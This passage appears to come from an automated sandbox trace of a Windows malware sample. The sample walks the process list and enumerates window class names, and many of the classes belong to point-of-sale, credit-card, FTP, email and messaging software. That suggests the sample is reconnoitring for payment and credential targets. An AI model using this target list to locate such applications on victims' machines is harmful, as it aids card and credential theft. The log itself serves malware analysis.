returned 1 [0304.992] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.993] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.045] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.142] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.144] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.146] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.149] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0305.155] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0305.157] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.159] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.160] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0305.162] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0305.164] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0305.165] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0305.170] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.171] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0305.173] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0305.175] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.176] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0305.178] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0305.179] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0305.181] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0305.336] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0305.339] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0305.342] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0305.344] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0305.347] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0305.349] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0305.350] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0305.352] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0305.353] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0305.357] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0305.359] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0305.361] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0305.362] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0305.364] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0305.365] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0305.367] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0305.368] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0305.370] Process32Next (hSnapshot=0x1040, lppe=0x1026fe20) Thread: id = 50 os_tid = 0x13bc [0105.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) returned 1 [0105.608] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0105.608] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0105.608] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0105.608] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x10120, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x10122, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x10118, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0105.608] GetClassNameA (in: hWnd=0x10116, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x10114, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0105.608] GetClassNameA (in: hWnd=0x10178, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0105.608] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0105.609] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0105.609] GetClassNameA (in: hWnd=0x10112, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.609] GetClassNameA (in: hWnd=0x10102, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0105.609] GetClassNameA (in: hWnd=0x10198, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0105.609] GetClassNameA (in: hWnd=0x10196, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0105.609] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0105.609] GetClassNameA (in: hWnd=0x10188, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0105.609] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100b6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x10098, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100a6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0105.609] GetClassNameA (in: hWnd=0x20030, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0105.609] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.609] GetClassNameA (in: hWnd=0x100da, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0105.609] GetClassNameA (in: hWnd=0x80088, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0105.610] GetClassNameA (in: hWnd=0x103ac, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Federalhotelwindow") returned 18 [0105.610] GetClassNameA (in: hWnd=0x20254, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.610] GetClassNameA (in: hWnd=0x2024e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Bed_Fight_cls") returned 13 [0105.610] GetClassNameA (in: hWnd=0x103a6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="StyleDesignbusinesswnd") returned 22 [0105.610] GetClassNameA (in: hWnd=0x103a8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="NewDoorwindow") returned 13 [0105.610] GetClassNameA (in: hWnd=0x103a4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="discussionwindow") returned 16 [0105.610] GetClassNameA (in: hWnd=0x1039a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00861820-7f9fa25") returned 28 [0105.610] GetClassNameA (in: hWnd=0x10386, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="utg2cls") returned 7 [0105.610] GetClassNameA (in: hWnd=0x10384, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="spgagentserviceapp") returned 18 [0105.610] GetClassNameA (in: hWnd=0x10374, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="omniposwin") returned 10 [0105.610] GetClassNameA (in: hWnd=0x10370, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="mxslipstreamcls") returned 15 [0105.610] GetClassNameA (in: hWnd=0x10380, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0105.610] GetClassNameA (in: hWnd=0x202b4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0105.610] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0105.610] GetClassNameA (in: hWnd=0x20288, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0105.610] GetClassNameA (in: hWnd=0x10366, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="edcsvrcls") returned 9 [0105.610] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0105.610] GetClassNameA (in: hWnd=0x10362, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="creditservice_class") returned 19 [0105.610] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ccv_serverclass") returned 15 [0105.610] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="afr38_app") returned 9 [0105.610] GetClassNameA (in: hWnd=0x10350, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0105.611] GetClassNameA (in: hWnd=0x10312, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0105.611] GetClassNameA (in: hWnd=0x10332, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0105.611] GetClassNameA (in: hWnd=0x10334, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="accuposwnd") returned 10 [0105.611] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="winscp_win") returned 10 [0105.611] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="yahoomessengerwin") returned 17 [0105.611] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="thunderbirdwin") returned 14 [0105.611] GetClassNameA (in: hWnd=0x10326, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="whatsapp_class") returned 14 [0105.611] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0105.611] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="scriptftpwnd") returned 12 [0105.611] GetClassNameA (in: hWnd=0x10320, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="webdrive_cls") returned 12 [0105.611] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="pidgin_cls") returned 10 [0105.611] GetClassNameA (in: hWnd=0x10308, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="skype_wnd") returned 9 [0105.611] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0105.611] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="operamail_") returned 10 [0105.611] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="ncftp_wnd") returned 9 [0105.611] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="notepad") returned 7 [0105.611] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="leechftp_wnd") returned 12 [0105.611] GetClassNameA (in: hWnd=0x102da, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="icq_app") returned 7 [0105.612] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="gmailnotifierproapp") returned 19 [0105.612] GetClassNameA (in: hWnd=0x102de, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="foxmailincmail_") returned 15 [0105.612] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="flashfxpcls") returned 11 [0105.612] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="filezillaapp") returned 12 [0105.612] GetClassNameA (in: hWnd=0x102be, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="fling_window") returned 12 [0105.612] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="coreftp") returned 7 [0105.612] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="farapp") returned 6 [0105.612] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="barcawindow") returned 11 [0105.612] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="bitkinexwin") returned 11 [0105.612] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="absolutetelnet_class") returned 20 [0105.612] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="alftpwindow") returned 11 [0105.612] GetClassNameA (in: hWnd=0x10298, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="3dftp_class") returned 11 [0105.612] GetClassNameA (in: hWnd=0x10286, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0105.612] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="whose_class") returned 11 [0105.612] GetClassNameA (in: hWnd=0x10266, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="HairFriendwillwin") returned 17 [0105.612] GetClassNameA (in: hWnd=0x10260, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="involve") returned 7 [0105.612] GetClassNameA (in: hWnd=0x10262, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="religious_Free_Generation_win") returned 29 [0105.612] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Magazine_official_teach_") returned 24 [0105.612] GetClassNameA (in: hWnd=0x10258, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="SmallMoneywin") returned 13 [0105.612] GetClassNameA (in: hWnd=0x10234, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="fearFewwin") returned 10 [0105.612] GetClassNameA (in: hWnd=0x10250, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Common_trade_Station_wnd") returned 24 [0105.613] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="take_whether_cls") returned 16 [0105.613] GetClassNameA (in: hWnd=0x10240, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="bag_begin_Gas_window") returned 20 [0105.613] GetClassNameA (in: hWnd=0x10232, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="charge_Model_Ready_app") returned 22 [0105.613] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="degree_sing_Pretty_") returned 19 [0105.613] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="light_Where_app") returned 15 [0105.613] GetClassNameA (in: hWnd=0x10228, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Real_New_window") returned 15 [0105.613] GetClassNameA (in: hWnd=0x10226, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="work_Heavy_win") returned 14 [0105.613] GetClassNameA (in: hWnd=0x10224, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Letter_") returned 7 [0105.613] GetClassNameA (in: hWnd=0x10222, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="memberclass") returned 11 [0105.613] GetClassNameA (in: hWnd=0x10210, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0105.613] GetClassNameA (in: hWnd=0x10206, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0105.613] GetClassNameA (in: hWnd=0x10200, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.613] GetClassNameA (in: hWnd=0x101f2, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0105.613] GetClassNameA (in: hWnd=0x401dc, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.613] GetClassNameA (in: hWnd=0x2015e, lpClassName=0x102efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0105.613] GetClassNameA (in: hWnd=0x2013a, lpClassName=0x102efd50, nMaxCount=260 | out: 